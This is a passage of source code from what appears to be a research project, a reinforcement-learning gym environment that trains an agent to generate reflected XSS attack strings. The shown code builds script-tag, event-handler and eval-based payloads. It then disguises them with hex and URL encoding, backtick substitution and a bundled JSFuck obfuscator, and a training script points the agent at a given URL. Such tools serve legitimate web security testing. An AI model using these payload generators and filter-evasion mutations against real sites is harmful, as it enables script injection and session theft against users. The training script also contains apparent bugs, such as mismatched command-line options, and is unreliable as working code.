146 |                 self.tag = ''.join([self.original_tag[0:length//2] , self.original_tag , self.original_tag[length//2:length]])
147 |                 self.status[obs.TAG_INSERTED] = 1
148 | 
149 | 
150 | 
151 |         elif action == act.INSERT_EFFECTIVE_TAG:
152 | 
153 |             if self.effective_tag != []:
154 |                 self.use_saved_tag = True
155 |                 self.status[obs.INSERT_EFFECTIVE_TAG] = 1
156 | 
157 |         elif action == act.MUTATE_PREFIX_COMMENT:
158 |             self.prefix = self.prefixComment 
159 | 
160 |         elif action == act.MUTATE_PREFIX_STYLE:
161 |             self.prefix = self.prefixStyle
162 | 
163 |         elif action == act.MUTATE_PREFIX_SINGLE_QUOTE_SEMIC:
164 |             self.prefix = "'; "
165 | 
166 |         elif action == act.MUTATE_PREFIX_DOUBLE_QUOTE_SEMIC:
167 |             self.prefix = '"; '
168 |         
169 |         
170 |         #elif action == act.MUTATE_PREFIX_DUMMY_SEMIC:
171 |         #    self.prefix = "1234; "
172 |         
173 |         elif action == act.PREFIX_ENTER:
174 |             self.prefix = "\r\n"
175 |         elif action == act.MUTATE_PREFIX_STRING_VALUE:
176 |             self.prefix = 'dummy '
177 | 
178 |         elif action == act.URL_VALUE:
179 | 
180 |             self.use_saved_tag = False
181 |             self.suffix = '' 
182 |             self.prefix = '' 
183 |             self.original_tag = ""
184 |             self.tag = ""
185 |             self.event = ""
186 |             self.attribute = "string"
187 |             self.value = self.URLPayload  
188 |             self.status[obs.HTML_TAG_USED] = 0
189 |             self.status[obs.HTML_SCRIPT_TAG_USED] = 0
190 |             self.status[obs.HTML_MEDIA_TAG_USED] = 0
191 | 
192 |             self.status[obs.EVENT_ELEMENT] = 0
193 |             self.status[obs.ATTRIBUTE_ELEMENT] = 0
194 |             self.status[obs.JS_PAYLOAD] = 0
195 |             self.status[obs.URL_PAYLOAD] = 1
196 |             self.status[obs.CHARACTER_UPPER] = 0
197 |             self.status[obs.TAG_INSERTED] = 0      
198 |             self.status[obs.JAVASCRIPT_FILE_NAME] = 0
199 |             self.status[obs.JAVASCRIPT_CODE] = 0
200 |             self.status[obs.ATTRIBUTE_UPPER] = 0
201 |             self.status[obs.NO_WHITE_SPACE] = 0
202 | 
203 | 
204 |         elif action == act.JAVASCRIPT_FILE:
205 | 
206 |             self.use_saved_tag = False
207 |             self.suffix = '' 
208 |             self.prefix = '' 
209 |             self.original_tag = ""
210 |             self.tag = ""
211 |             self.event = ""
212 |             self.attribute = "string"
213 |             self.value = self.JSFILEPayload
214 |             self.status[obs.HTML_TAG_USED] = 0
215 |             self.status[obs.HTML_SCRIPT_TAG_USED] = 0
216 |             self.status[obs.HTML_MEDIA_TAG_USED] = 0
217 | 
218 |             self.status[obs.EVENT_ELEMENT] = 0
219 |             self.status[obs.ATTRIBUTE_ELEMENT] = 0
220 |             self.status[obs.JS_PAYLOAD] = 0
221 |             self.status[obs.URL_PAYLOAD] = 0
222 |             self.status[obs.CHARACTER_UPPER] = 0
223 |             self.status[obs.TAG_INSERTED] = 0  
224 |             self.status[obs.JAVASCRIPT_FILE_NAME] = 1
225 |             self.status[obs.JAVASCRIPT_CODE] = 0
226 |             self.status[obs.ATTRIBUTE_UPPER] = 0
227 |             self.status[obs.NO_WHITE_SPACE] = 0
228 | 
229 |         elif action == act.SRC_URL:
230 |             self.use_saved_tag = False
231 |             self.suffix = '' 
232 |             self.prefix = '' 
233 |             self.original_tag = ""
234 |             self.tag = ""
235 |             self.event = ""
236 |             self.attribute = "src"
237 |             self.value = self.JSFILEPayload
238 |             self.status[obs.HTML_TAG_USED] = 0
239 |             self.status[obs.HTML_SCRIPT_TAG_USED] = 0
240 |             self.status[obs.HTML_MEDIA_TAG_USED] = 0
241 | 
242 |             self.status[obs.EVENT_ELEMENT] = 0
243 |             self.status[obs.ATTRIBUTE_ELEMENT] = 1
244 |             self.status[obs.JS_PAYLOAD] = 0
245 |             self.status[obs.URL_PAYLOAD] = 0
246 |             self.status[obs.CHARACTER_UPPER] = 0
247 |             self.status[obs.TAG_INSERTED] = 0  
248 |             self.status[obs.JAVASCRIPT_FILE_NAME] = 1
249 |             self.status[obs.JAVASCRIPT_CODE] = 0
250 |             self.status[obs.ATTRIBUTE_UPPER] = 0
251 |             self.status[obs.NO_WHITE_SPACE] = 0
252 | 
253 |         elif action == act.IN_JAVASCRIPT:
254 |             self.suffix = '' 
255 |             self.prefix = '' 
256 |             self.use_saved_tag = False
257 |             self.original_tag = ""
258 |             self.tag = ""
259 |             self.attribute = "string"
260 |             self.value = self.JSPayload
261 |             self.status[obs.HTML_TAG_USED] = 0
262 |             self.status[obs.HTML_SCRIPT_TAG_USED] = 0
263 |             self.status[obs.HTML_MEDIA_TAG_USED] = 0
264 | 
265 |             self.status[obs.EVENT_ELEMENT] = 0
266 |             self.status[obs.ATTRIBUTE_ELEMENT] = 0
267 |             self.status[obs.JS_PAYLOAD] = 1
268 |             self.status[obs.URL_PAYLOAD] = 0
269 |             self.status[obs.CHARACTER_UPPER] = 0
270 |             self.status[obs.TAG_INSERTED] = 0  
271 |             self.status[obs.JAVASCRIPT_FILE_NAME] = 0
272 |             self.status[obs.JAVASCRIPT_CODE] = 1
273 |             self.status[obs.ATTRIBUTE_UPPER] = 0
274 |             self.status[obs.NO_WHITE_SPACE] = 0
275 | 
276 | 
277 |         elif action == act.TAG_ATTRIBUTE_UPPER:
278 |             if self.attribute != "string":
279 |                 new_attribute = ''.join(str.upper(c) for c in self.attribute)
280 |                 self.attribute = new_attribute
281 |                 self.status[obs.ATTRIBUTE_UPPER] = 1
282 | 
283 |         elif action == act.IN_JAVASCRIPT_PREFIX_SUFFIX_DOUBLE:
284 |             self.prefix = '"+ '
285 |             self.suffix = ' +"'
286 | 
287 |         elif action == act.IN_JAVASCRIPT_PREFIX_SUFFIX_SINGLE:
288 |             self.prefix = "'+ "
289 |             self.suffix = " +'"
290 | 
291 |         elif action == act.HEXA_ENCODING:
292 |             self.status[obs.HEXA_ENCODING] = 1
293 | 
294 |         elif action == act.WHITE_SPACE_TO_SLASH:
295 |             self.status[obs.NO_WHITE_SPACE] = 1
296 | 
297 |         elif action == act.MUTATE_JAVA_SCRIPT:
298 |             if self.status[obs.JS_PAYLOAD] == 1:
299 |                 self.value = choice(["prompt(1)", "confirm(1)"])
300 | 
301 | 
302 |         elif action == act.DIVIDE_JAVASCRIPT:
303 |             if self.status[obs.JS_PAYLOAD]:
304 |                 self.value = "'" + 'var A = "al" + "er" + "t(1);";eval(A);' + "'"
305 |         
306 |         elif action == act.JAVASCRIPT_NO_PARENTHESIS:
307 |             if self.status[obs.HTML_SCRIPT_TAG_USED] == 1:
308 |                 self.value = "onerror=alert;throw 1"
309 | 
310 |         if action == act.MUTATE_QUOTATION_TO_BACK_TICK:
311 |             self.prefix = self.prefix.replace("'",'`')
312 |             self.prefix = self.prefix.replace('"','`')
313 |             self.suffix = self.suffix.replace("'",'`')
314 |             self.suffix = self.suffix.replace('"','`')
315 |             self.value = self.value.replace('"','`')
316 |             self.value = self.value.replace("'",'`')
317 |             
318 |         if action == act.MUTATE_PARENTHESIS_TO_BACK_TICK:
319 |             self.prefix = self.prefix.replace(")",'`')
320 |             self.prefix = self.prefix.replace('(','`')
321 |             self.suffix = self.suffix.replace(")",'`')
322 |             self.suffix = self.suffix.replace('(','`')
323 |             self.value = self.value.replace(')','`')
324 |             self.value = self.value.replace("(",'`')
325 | 
326 |         generated_input =""
327 |         if self.tag != "":
328 |             if self.use_saved_tag:
329 |                 generated_input = ''.join([self.prefix , "</" , choice(self.effective_tag) , ">" ,self.forebracket1, self.tag])
330 |             else:
331 |                 self.status[obs.INSERT_EFFECTIVE_TAG] = 0
332 |                 generated_input = ''.join([self.prefix , self.forebracket1 , self.tag])
333 |             
334 |             if self.event:
335 |                 if self.attribute != "string" and self.attribute != "STRING" and action:
336 |                     generated_input = ''.join([generated_input , " " , self.attribute , "=\'x\' ", self.event , "=" , self.value , " ", self.forebracket2])
337 |                 else:
338 |                     generated_input = ''.join([generated_input , " " , self.event , "=" , self.value , " ",self.forebracket2])
339 |             elif self.attribute != "string":
340 |                 generated_input = ''.join([generated_input , " " , self.attribute , "=" , self.value , " ",self.forebracket2])
341 |             else:
342 |                 generated_input = ''.join([generated_input , ">" , self.value]) 
343 |             generated_input = ''.join([generated_input , self.backbracket , self.tag , self.backbracket2 , self.suffix])
344 |         else:
345 |             
346 |             if self.status[obs.EVENT_ELEMENT] == 1 and self.status[obs.JS_PAYLOAD] == 1:
347 |                 # generated_input = ''.join([self.prefix , "src=\'x\' " , self.event , "=" , self.value , self.suffix])
348 |                 generated_input = ''.join([self.prefix , self.event , "=" , self.value , self.suffix])
349 |             elif self.status[obs.ATTRIBUTE_ELEMENT] == 1 and self.status[obs.JAVASCRIPT_FILE_NAME] == 1:
350 |                 generated_input = ''.join([self.prefix , self.attribute , "=" , self.value , self.suffix])
351 |             elif self.value != "":
352 |                 generated_input = ''.join([self.prefix , self.value , self.suffix])
353 | 
354 |         
355 | 
356 |         if action == act.HEXA_ENCODING:
357 |             add_random = False
358 |             generated_input = self.hexa_encoding(generated_input)
359 | 
360 |         if action == act.WHITE_SPACE_TO_SLASH:
361 |             generated_input = self.whilte_space_to_slash(generated_input)
362 | 
363 |         """if action == act.BASE64_ENCODING:
364 |             add_random = False
365 |             encoded_input = base64.b64encode(generated_input.encode('utf-8'))
366 |             encoded_input = str(encoded_input, 'utf-8')
367 |             generated_input = ''.join(["data:text/html;base64,",encoded_input])
368 |             self.status[obs.BASE64] = 1"""
369 |         
370 |         if action == act.URL_ENCODING:
371 |             add_random = False
372 |             generated_input = parse.quote(generated_input)
373 |             self.status[obs.URL_ENCODING] = 1
374 | 
375 |         if action == act.CODE_OBFUSCATION:
376 |             add_random = False
377 |             jsf = JSFuck()
378 |             generated_input = jsf.encode(generated_input)
379 |             self.status[obs.CODE_OBSFUSCATION] = 1
380 | 
381 | 
382 |         # make observation about genrated input
383 |         if "script" in generated_input:
384 |             self.status[obs.CONTAIN_SCRIPT_STRING] = 1
385 |         else:
386 |             self.status[obs.CONTAIN_SCRIPT_STRING] = 0
387 | 
388 |         if "'" in generated_input:
389 |             self.status[obs.SINGLE_QUOTATION] = 1
390 |         else:
391 |             self.status[obs.SINGLE_QUOTATION] = 0
392 | 
393 |         if '"' in generated_input:
394 |             self.status[obs.DOUBLE_QUOTATION] = 1
395 |         else:
396 |             self.status[obs.DOUBLE_QUOTATION] = 0
397 | 
398 |         if "/" in generated_input:
399 |             self.status[obs.BACKSLASH] = 1
400 |         else:
401 |             self.status[obs.BACKSLASH] = 0
402 | 
403 |         if "--" in generated_input:
404 |             self.status[obs.HTML_COMMENT_USED] = 1
405 |         else:
406 |             self.status[obs.HTML_COMMENT_USED] = 0
407 | 
408 |         if "dummy" in generated_input:
409 |             self.status[obs.STRING_PREFIX] = 1
410 |         else: 
411 |             self.status[obs.STRING_PREFIX] = 0
412 | 
413 |         if "(" in generated_input or ")" in generated_input:
414 |             self.status[obs.PARENTHESIS] = 1
415 |         else:
416 |             self.status[obs.PARENTHESIS] = 0
417 | 
418 |         if "`" in generated_input:
419 |             self.status[obs.BACK_TICK] = 1
420 |         else:
421 |             self.status[obs.BACK_TICK] = 0
422 |         
423 |         if "<" in generated_input or ">" in generated_input:
424 |             self.status[obs.BRACKET] = 1
425 |         else:
426 |             self.status[obs.BRACKET] = 0
427 | 
428 |         if "alert" in generated_input:
429 |             self.status[obs.ALERT_STRING] = 1
430 |         else:
431 |             self.status[obs.ALERT_STRING] = 0
432 | 
433 |         if "*" in generated_input:
434 |             self.status[obs.JS_COMMENT_USED] = 1
435 |         else:
436 |             self.status[obs.JS_COMMENT_USED] = 0
437 | 
438 |         if "\r\n" in generated_input:
439 |             self.status[obs.PREFIX_ENTER] = 1
440 |         else:
441 |             self.status[obs.PREFIX_ENTER] = 0
442 | 
443 |         # print("generated: " + generated_input)
444 |         self.previous_input = self.current_input
445 |         self.current_input = generated_input
446 | 
447 |         # add to dictionary
448 |         cnt_step = self.input_corpus['steps'] + 1
449 |         self.input_corpus['steps'] = cnt_step
450 |         if generated_input == "":
451 |             key_input = "space"
452 |         else:
453 |             key_input = generated_input
454 |         if key_input in self.input_corpus:
455 |             new_value = self.input_corpus[key_input] + 1
456 |             self.input_corpus[key_input] = new_value
457 |         else:
458 |             self.input_corpus[key_input] = 1
459 |         
460 |         if ( self.input_corpus[key_input] - 1) > 0:
461 |             self.status[obs.INPUT_CORPUS] = (self.input_corpus[key_input] - 1) / 500
462 |             
463 |         #print(self.status[obs.INPUT_CORPUS])
464 |         #print(self.input_corpus[key_input] / self.input_corpus['steps'])
465 |         # if default payload is number, we add number infront of the payload
466 |         if self.status[obs.DEFAULT_PAYLOAD_TYPE] == 1 and add_random and self.tag != "" :
467 |             return ''.join([str(self.random_tag), generated_input,str(self.random_tag) ])
468 |         elif add_random and self.tag != "" :
469 |             return ''.join([generated_input,str(self.random_tag) ])
470 |         else:
471 |             return generated_input
472 | 
473 | 
474 |     def hexa_encoding(self,result):
475 |         result = result.replace('<',r"\74")
476 |         result = result.replace('>',r'\76')
477 |         return result
478 |     
479 |     def whilte_space_to_slash(self,result):
480 |         result = result.replace(' ', '/')
481 |         return result
482 | 
483 |     def action_0(self):
484 |         self.init_status()
485 |         self.prefix = ""
486 |         self.tag = "script" 
487 |         self.attribute = "string" 
488 |         self.event = ""
489 |         self.value = self.JSPayload
490 |         self.suffix = ""  
491 |         self.status[obs.HTML_TAG_USED] = 1
492 |         self.status[obs.HTML_SCRIPT_TAG_USED] = 1
493 |         self.status[obs.HTML_MEDIA_TAG_USED] = 0
494 | 
495 |         self.status[obs.EVENT_ELEMENT] = 0
496 |         self.status[obs.ATTRIBUTE_ELEMENT] = 0
497 |         self.status[obs.JS_PAYLOAD] = 1
498 |         self.status[obs.URL_PAYLOAD] = 0
499 |         self.status[obs.CHARACTER_UPPER] = 0
500 |         self.status[obs.TAG_INSERTED] = 0
501 |         self.status[obs.JAVASCRIPT_FILE_NAME] = 0
502 |         self.status[obs.JAVASCRIPT_CODE] = 0
503 |         self.status[obs.NO_WHITE_SPACE] = 0
504 | 
505 | 
506 |     def action_1(self):
507 |         self.init_status()
508 |         self.prefix = ""
509 |         self.tag = choice(self.mediaTag)
510 |         self.attribute = "src" 
511 |         self.event = choice(self.htmlevent)
512 |         self.value = self.JSPayload
513 |         self.suffix = ""  
514 |         self.status[obs.HTML_TAG_USED] = 1
515 |         self.status[obs.HTML_SCRIPT_TAG_USED] = 0
516 |         self.status[obs.HTML_MEDIA_TAG_USED] = 1
517 | 
518 |         self.status[obs.EVENT_ELEMENT] = 1
519 |         self.status[obs.ATTRIBUTE_ELEMENT] = 1
520 |         self.status[obs.JS_PAYLOAD] = 1
521 |         self.status[obs.URL_PAYLOAD] = 0
522 |         self.status[obs.CHARACTER_UPPER] = 0
523 |         self.status[obs.TAG_INSERTED] = 0
524 |         self.status[obs.JAVASCRIPT_FILE_NAME] = 0
525 |         self.status[obs.JAVASCRIPT_CODE] = 0
526 |         self.status[obs.ATTRIBUTE_UPPER] = 0
527 |         self.status[obs.NO_WHITE_SPACE] = 0
528 | 
529 | 
530 |     def action_2(self):
531 |         self.init_status()
532 |         self.prefix = ""
533 |         self.tag = ""
534 |         self.attribute = "" 
535 |         self.event = "onmouseover"
536 |         self.value = 'alert(0727);'
537 |         self.suffix = '' 
538 |         self.status[obs.HTML_TAG_USED] = 0
539 |         self.status[obs.HTML_SCRIPT_TAG_USED] = 0
540 |         self.status[obs.HTML_MEDIA_TAG_USED] = 0
541 | 
542 |         self.status[obs.EVENT_ELEMENT] = 1
543 |         self.status[obs.ATTRIBUTE_ELEMENT] = 0
544 |         self.status[obs.JS_PAYLOAD] = 1
545 |         self.status[obs.URL_PAYLOAD] = 0
546 |         self.status[obs.CHARACTER_UPPER] = 0
547 |         self.status[obs.TAG_INSERTED] = 0
548 |         self.status[obs.JAVASCRIPT_FILE_NAME] = 0
549 |         self.status[obs.JAVASCRIPT_CODE] = 0
550 |         self.status[obs.ATTRIBUTE_UPPER] = 0
551 |         self.status[obs.NO_WHITE_SPACE] = 0
552 | 
553 | 
554 |     def init_status(self):
555 |         for i in range(0, 18):
556 |             self.status[i] = 0
557 |     
558 |     def initialize_all_state(self):
559 |         for i in range(0, len(self.status)):
560 |             self.status[i] = 0
561 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/input_module/jsfuck.js:
--------------------------------------------------------------------------------
  1 | /*! JSFuck 0.4.0 - http://jsfuck.com */
  2 | 
  3 | function JSFuck(code){
  4 | 
  5 |   var USE_CHAR_CODE = "USE_CHAR_CODE";
  6 | 
  7 |   var MIN = 32, MAX = 126;
  8 | 
  9 |   var SIMPLE = {
 10 |     'false':      '![]',
 11 |     'true':       '!![]',
 12 |     'undefined':  '[][[]]',
 13 |     'NaN':        '+[![]]',
 14 |     'Infinity':   '+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]]+[+[]])' // +"1e1000"
 15 |   };
 16 | 
 17 |   var CONSTRUCTORS = {
 18 |     'Array':    '[]',
 19 |     'Number':   '(+[])',
 20 |     'String':   '([]+[])',
 21 |     'Boolean':  '(![])',
 22 |     'Function': '[]["fill"]',
 23 |     'RegExp':   'Function("return/"+false+"/")()'
 24 |   };
 25 | 
 26 |   var MAPPING = {
 27 |     'a':   '(false+"")[1]',
 28 |     'b':   '([]["entries"]()+"")[2]',
 29 |     'c':   '([]["fill"]+"")[3]',
 30 |     'd':   '(undefined+"")[2]',
 31 |     'e':   '(true+"")[3]',
 32 |     'f':   '(false+"")[0]',
 33 |     'g':   '(false+[0]+String)[20]',
 34 |     'h':   '(+(101))["to"+String["name"]](21)[1]',
 35 |     'i':   '([false]+undefined)[10]',
 36 |     'j':   '([]["entries"]()+"")[3]',
 37 |     'k':   '(+(20))["to"+String["name"]](21)',
 38 |     'l':   '(false+"")[2]',
 39 |     'm':   '(Number+"")[11]',
 40 |     'n':   '(undefined+"")[1]',
 41 |     'o':   '(true+[]["fill"])[10]',
 42 |     'p':   '(+(211))["to"+String["name"]](31)[1]',
 43 |     'q':   '(+(212))["to"+String["name"]](31)[1]',
 44 |     'r':   '(true+"")[1]',
 45 |     's':   '(false+"")[3]',
 46 |     't':   '(true+"")[0]',
 47 |     'u':   '(undefined+"")[0]',
 48 |     'v':   '(+(31))["to"+String["name"]](32)',
 49 |     'w':   '(+(32))["to"+String["name"]](33)',
 50 |     'x':   '(+(101))["to"+String["name"]](34)[1]',
 51 |     'y':   '(NaN+[Infinity])[10]',
 52 |     'z':   '(+(35))["to"+String["name"]](36)',
 53 | 
 54 |     'A':   '(+[]+Array)[10]',
 55 |     'B':   '(+[]+Boolean)[10]',
 56 |     'C':   'Function("return escape")()(("")["italics"]())[2]',
 57 |     'D':   'Function("return escape")()([]["fill"])["slice"]("-1")',
 58 |     'E':   '(RegExp+"")[12]',
 59 |     'F':   '(+[]+Function)[10]',
 60 |     'G':   '(false+Function("return Date")()())[30]',
 61 |     'H':   USE_CHAR_CODE,
 62 |     'I':   '(Infinity+"")[0]',
 63 |     'J':   USE_CHAR_CODE,
 64 |     'K':   USE_CHAR_CODE,
 65 |     'L':   USE_CHAR_CODE,
 66 |     'M':   '(true+Function("return Date")()())[30]',
 67 |     'N':   '(NaN+"")[0]',
 68 |     'O':   '(NaN+Function("return{}")())[11]',
 69 |     'P':   USE_CHAR_CODE,
 70 |     'Q':   USE_CHAR_CODE,
 71 |     'R':   '(+[]+RegExp)[10]',
 72 |     'S':   '(+[]+String)[10]',
 73 |     'T':   '(NaN+Function("return Date")()())[30]',
 74 |     'U':   '(NaN+Function("return{}")()["to"+String["name"]]["call"]())[11]',
 75 |     'V':   USE_CHAR_CODE,
 76 |     'W':   USE_CHAR_CODE,
 77 |     'X':   USE_CHAR_CODE,
 78 |     'Y':   USE_CHAR_CODE,
 79 |     'Z':   USE_CHAR_CODE,
 80 | 
 81 |     ' ':   '(NaN+[]["fill"])[11]',
 82 |     '!':   USE_CHAR_CODE,
 83 |     '"':   '("")["fontcolor"]()[12]',
 84 |     '#':   USE_CHAR_CODE,
 85 |     '$':   USE_CHAR_CODE,
 86 |     '%':   'Function("return escape")()([]["fill"])[21]',
 87 |     '&':   '("")["link"](0+")[10]',
 88 |     '\'':  USE_CHAR_CODE,
 89 |     '(':   '(undefined+[]["fill"])[22]',
 90 |     ')':   '([0]+false+[]["fill"])[20]',
 91 |     '*':   USE_CHAR_CODE,
 92 |     '+':   '(+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]])+[])[2]',
 93 |     ',':   '([]["slice"]["call"](false+"")+"")[1]',
 94 |     '-':   '(+(.+[0000000001])+"")[2]',
 95 |     '.':   '(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]',
 96 |     '/':   '(false+[0])["italics"]()[10]',
 97 |     ':':   '(RegExp()+"")[3]',
 98 |     ';':   '("")["link"](")[14]',
 99 |     '<':   '("")["italics"]()[0]',
100 |     '=':   '("")["fontcolor"]()[11]',
101 |     '>':   '("")["italics"]()[2]',
102 |     '?':   '(RegExp()+"")[2]',
103 |     '@':   USE_CHAR_CODE,
104 |     '[':   '([]["entries"]()+"")[0]',
105 |     '\\':  USE_CHAR_CODE,
106 |     ']':   '([]["entries"]()+"")[22]',
107 |     '^':   USE_CHAR_CODE,
108 |     '_':   USE_CHAR_CODE,
109 |     '`':   USE_CHAR_CODE,
110 |     '{':   '(true+[]["fill"])[20]',
111 |     '|':   USE_CHAR_CODE,
112 |     '}':   '([]["fill"]+"")["slice"]("-1")',
113 |     '~':   USE_CHAR_CODE
114 |   };
115 | 
116 |   var GLOBAL = 'Function("return this")()';
117 | 
118 |   function fillMissingChars(){
119 |     for (var key in MAPPING){
120 |       if (MAPPING[key] === USE_CHAR_CODE){
121 |         MAPPING[key] = 'Function("return unescape")()("%"'+ key.charCodeAt(0).toString(16).replace(/(\d+)/g, "+($1)+\"") + '")';
122 |       }
123 |     }
124 |   }
125 | 
126 |   function fillMissingDigits(){
127 |     var output, number, i;
128 | 
129 |     for (number = 0; number < 10; number++){
130 | 
131 |       output = "+[]";
132 | 
133 |       if (number > 0){ output = "+!" + output; }
134 |       for (i = 1; i < number; i++){ output = "+!+[]" + output; }
135 |       if (number > 1){ output = output.substr(1); }
136 | 
137 |       MAPPING[number] = "[" + output + "]";
138 |     }
139 |   }
140 | 
141 |   function replaceMap(){
142 |     var character = "", value, original, i, key;
143 | 
144 |     function replace(pattern, replacement){
145 |       value = value.replace(
146 |         new RegExp(pattern, "gi"),
147 |         replacement
148 |       );
149 |     }
150 | 
151 |     function digitReplacer(_,x) { return MAPPING[x]; }
152 | 
153 |     function numberReplacer(_,y) {
154 |       var values = y.split("");
155 |       var head = +(values.shift());
156 |       var output = "+[]";
157 | 
158 |       if (head > 0){ output = "+!" + output; }
159 |       for (i = 1; i < head; i++){ output = "+!+[]" + output; }
160 |       if (head > 1){ output = output.substr(1); }
161 | 
162 |       return [output].concat(values).join("+").replace(/(\d)/g, digitReplacer);
163 |     }
164 | 
165 |     for (i = MIN; i <= MAX; i++){
166 |       character = String.fromCharCode(i);
167 |       value = MAPPING[character];
168 |       if(!value) {continue;}
169 |       original = value;
170 | 
171 |       for (key in CONSTRUCTORS){
172 |         replace("\\b" + key, CONSTRUCTORS[key] + '["constructor"]');
173 |       }
174 | 
175 |       for (key in SIMPLE){
176 |         replace(key, SIMPLE[key]);
177 |       }
178 | 
179 |       replace('(\\d\\d+)', numberReplacer);
180 |       replace('\\((\\d)\\)', digitReplacer);
181 |       replace('\\[(\\d)\\]', digitReplacer);
182 | 
183 |       replace("GLOBAL", GLOBAL);
184 |       replace('\\+""', "+[]");
185 |       replace('""', "[]+[]");
186 | 
187 |       MAPPING[character] = value;
188 |     }
189 |   }
190 | 
191 |   function replaceStrings(){
192 |     var regEx = /[^\[\]\(\)\!\+]{1}/g,
193 |       all, value, missing,
194 |       count = MAX - MIN;
195 | 
196 |     function findMissing(){
197 |       var all, value, done = false;
198 | 
199 |       missing = {};
200 | 
201 |       for (all in MAPPING){
202 | 
203 |         value = MAPPING[all];
204 | 
205 |         if (value.match(regEx)){
206 |           missing[all] = value;
207 |           done = true;
208 |         }
209 |       }
210 | 
211 |       return done;
212 |     }
213 | 
214 |     function mappingReplacer(a, b) {
215 |       return b.split("").join("+");
216 |     }
217 | 
218 |     function valueReplacer(c) {
219 |       return missing[c] ? c : MAPPING[c];
220 |     }
221 | 
222 |     for (all in MAPPING){
223 |       MAPPING[all] = MAPPING[all].replace(/\"([^\"]+)\"/gi, mappingReplacer);
224 |     }
225 | 
226 |     while (findMissing()){
227 |       for (all in missing){
228 |         value = MAPPING[all];
229 |         value = value.replace(regEx, valueReplacer);
230 | 
231 |         MAPPING[all] = value;
232 |         missing[all] = value;
233 |       }
234 | 
235 |       if (count-- === 0){
236 |         console.error("Could not compile the following chars:", missing);
237 |       }
238 |     }
239 |   }
240 | 
241 |   function encode(input, wrapWithEval, runInParentScope){
242 |     var output = [];
243 | 
244 |     if (!input){
245 |       return "";
246 |     }
247 | 
248 |     var r = "";
249 |     for (var i in SIMPLE) {
250 |       r += i + "|";
251 |     }
252 |     r+=".";
253 | 
254 |     input.replace(new RegExp(r, 'g'), function(c) {
255 |       var replacement = SIMPLE[c];
256 |       if (replacement) {
257 |         output.push("[" + replacement + "]+[]");
258 |       } else {
259 |         replacement = MAPPING[c];
260 |         if (replacement){
261 |           output.push(replacement);
262 |         } else {
263 |           replacement =
264 |             "([]+[])[" + encode("constructor") + "]" +
265 |             "[" + encode("fromCharCode") + "]" +
266 |             "(" + encode(c.charCodeAt(0) + "") + ")";
267 | 
268 |           output.push(replacement);
269 |           MAPPING[c] = replacement;
270 |         }
271 |       }
272 |     });
273 | 
274 |     output = output.join("+");
275 | 
276 |     if (/^\d$/.test(input)){
277 |       output += "+[]";
278 |     }
279 | 
280 |     if (wrapWithEval){
281 |       if (runInParentScope){
282 |         output = "[][" + encode("fill") + "]" +
283 |           "[" + encode("constructor") + "]" +
284 |           "(" + encode("return eval") +  ")()" +
285 |           "(" + output + ")";
286 |       } else {
287 |         output = "[][" + encode("fill") + "]" +
288 |           "[" + encode("constructor") + "]" +
289 |           "(" + output + ")()";
290 |       }
291 |     }
292 | 
293 |     return output;
294 |   }
295 | 
296 |   fillMissingDigits();
297 |   fillMissingChars();
298 |   replaceMap();
299 |   replaceStrings();
300 | 
301 |   var js_fuck_payload = encode(code,1);
302 |   return js_fuck_payload;
303 | };
304 | 


--------------------------------------------------------------------------------
/gym_reflected_xss/input_module/pyjsfuck.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | 
 4 | import execjs
 5 | 
 6 | 
 7 | class JSFuck():
 8 | 
 9 |     def __init__(self):
10 |         f = open('gym_reflected_xss/input_module/jsfuck.js', 'r')
11 |         jsf_code = f.read()
12 |         js = execjs.get()
13 |         #print "Using Engine %s" % js.name
14 |         self.jsf_int = js.compile(jsf_code)
15 |         pass
16 | 
17 |     def encode(self, code):
18 |         return self.jsf_int.call('JSFuck',code,'1')
19 | 
20 | 
21 | if __name__ == '__main__':
22 |     code = 'alert(1);'
23 |     jsf = JSFuck()
24 |     string = jsf.encode(code)
25 |     print(string)
26 | 


--------------------------------------------------------------------------------
/sample_agent.pkl:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WSP-LAB/Link/965cd082b57b1241cbcf0aa255cb5ad8e2761a0b/sample_agent.pkl


--------------------------------------------------------------------------------
/train_A2C.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import getopt
 3 | import time
 4 | import gym
 5 | import gym_reflected_xss
 6 | import uuid
 7 | from stable_baselines.common.vec_env import DummyVecEnv
 8 | from stable_baselines3.a2c.policies import MlpPolicy, CnnPolicy
 9 | 
10 | 
11 | from stable_baselines import A2C
12 | from stable_baselines.common import make_vec_env
13 | import torch as th
14 | # remove tensorflow warning messages
15 | import warnings
16 | warnings.simplefilter(action='ignore', category=FutureWarning)
17 | import tensorflow as tf
18 | tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
19 | 
20 | from stable_baselines.common.policies import FeedForwardPolicy, LstmPolicy
21 | # Custom MLP policy of three layers of size 128 each
22 | class CustomPolicy(FeedForwardPolicy):
23 |     def __init__(self,*args, **kwargs):
24 |         super(CustomPolicy, self).__init__(*args, **kwargs, 
25 |                                            net_arch=[dict(pi=[128, 128, 128],
26 |                                                           vf=[128, 128, 128])],
27 |                                            feature_extraction="mlp")
28 | class CustomLSTMPolicy(LstmPolicy):
29 |     def __init__(self, sess, ob_space, ac_space, n_env, n_steps, n_batch, n_lstm=128, reuse=False, **_kwargs):
30 |         super().__init__(sess, ob_space, ac_space, n_env, n_steps, n_batch, n_lstm, reuse,
31 |                          net_arch=[128, 'lstm', dict(pi=[128, 128, 128],
32 |                                                     vf=[128, 128, 128])],
33 |                          layer_norm=True, feature_extraction="mlp", **_kwargs)
34 | 
35 | def main(argv):
36 |     start_url = ""
37 |     test_suite_name = ""
38 |     timesteps = 4000000
39 | 
40 |     try:
41 |         opts, etc_args= getopt.getopt(argv[1:], "o:t:")
42 |     except getopt.GetoptError:
43 |         print("Use option -o")
44 |         sys.exit(2)
45 |     
46 |     for opt,arg in opts:
47 |         if opt in ("-u"):
48 |             option = arg
49 |         if opt in ("-t"):
50 |             timesteps = int(arg)
51 | 
52 |     
53 |     start_url = option
54 | 
55 |     
56 |     env = gym.make("reflected-xss-v0", start_url=start_url, mode=0, log_file_name="train_log.txt")
57 | 
58 |     # create learning agent 
